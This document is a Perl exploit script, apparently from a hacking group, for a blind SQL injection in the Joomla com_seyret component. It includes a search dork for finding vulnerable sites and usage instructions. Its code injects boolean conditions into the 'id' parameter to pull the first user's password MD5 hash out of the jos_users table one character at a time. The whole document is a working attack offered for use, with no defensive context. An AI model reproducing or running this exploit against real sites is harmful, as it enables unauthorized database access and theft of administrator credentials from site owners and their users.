Joomla com_seyret Blind SQL Injection Exploit

1. #!/usr/bin/perl
2. use LWP::UserAgent;
3. use Getopt::Long;
4.  
5. if(!$ARGV[1])
6. {
7. system("Title Albanian Hacking Crew");
8. print " \n";
9. print " #######################################################################\n";
10. print " # Joomla Component (com_seyret) Blind SQL Injection Exploit \n";
11. print " # -----------------------------------------------------------\n";
12. print " # Author: **RoAd_KiLlEr** \n";
13. print " # Greetz: Ton![W]indowS,X-n3t,b4cKd00r ~,DarkHacker.,The|DennY`\n";
14. print " # Site: www.a-h-crew.net\n";
15. print " # -----------------------------------------------------------\n";
16. print " # Dork : inurl:com_seyret \n";
17. print " # Usage: perl exploit.pl host path <options> \n";
18. print " # Example: perl exploit.pl www.host.com /path/ -a 3 \n";
19. print " # -----------------------------------------------------------\n";
20. print " # Options: \n";
21. print " # -a valid id \n";
22. print " #######################################################################\n";
23. exit;
24. }
25.  
26. my $host = $ARGV[0];
27. my $path = $ARGV[1];
28. my $userid = 1;
29. my $aid = $ARGV[2];
30.  
31. my %options = ();
32. GetOptions(\%options, "u=i", "p=s", "a=i");
33.  
34. print "[~] Exploiting...\n";
35.  
36. if($options{"u"})
37. {
38. $userid = $options{"u"};
39. }
40.  
41. if($options{"a"})
42. {
43. $aid = $options{"a"};
44. }
45.  
46. syswrite(STDOUT, "[~] MD5-Hash: ", 14);
47.  
48. for(my $i = 1; $i <= 32; $i++)
49. {
50. my $f = 0;
51. my $h = 48;
52. while(!$f && $h <= 57)
53. {
54. if(istrue2($host, $path, $userid, $aid, $i, $h))
55. {
56. $f = 1;
57. syswrite(STDOUT, chr($h), 1);
58. }
59. $h++;
60. }
61. if(!$f)
62. {
63. $h = 97;
64. while(!$f && $h <= 122)
65. {
66. if(istrue2($host, $path, $userid, $aid, $i, $h))
67. {
68. $f = 1;
69. syswrite(STDOUT, chr($h), 1);
70. }
71. $h++;
72. }
73. }
74. }
75.  
76. print "\n[~] Exploiting done\n";
77.  
78. sub istrue2
79. {
80. my $host = shift;
81. my $path = shift;
82. my $uid = shift;
83. my $aid = shift;
84. my $i = shift;
85. my $h = shift;
86.  
87. my $ua = LWP::UserAgent->new;
88. my $query = "http://".$host.$path."index.php? option=com_seyret&task=videodirectlink&id=".$aid." and ascii(SUBSTRING((SELECT password FROM jos_users LIMIT 0,1),".$i.",1))=".$h."";
89.  
90. if($options{"p"})
91. {
92. $ua->proxy('http', "http://".$options{"p"});
93. }
94.  
95. my $resp = $ua->get($query);
96. my $content = $resp->content;
97. my $regexp = "Back";
98.  
99. if($content =~ /$regexp/)
100. {
101. return 1;
102. }
103. else
104. {
105. return 0;
106. }
107.  
108. }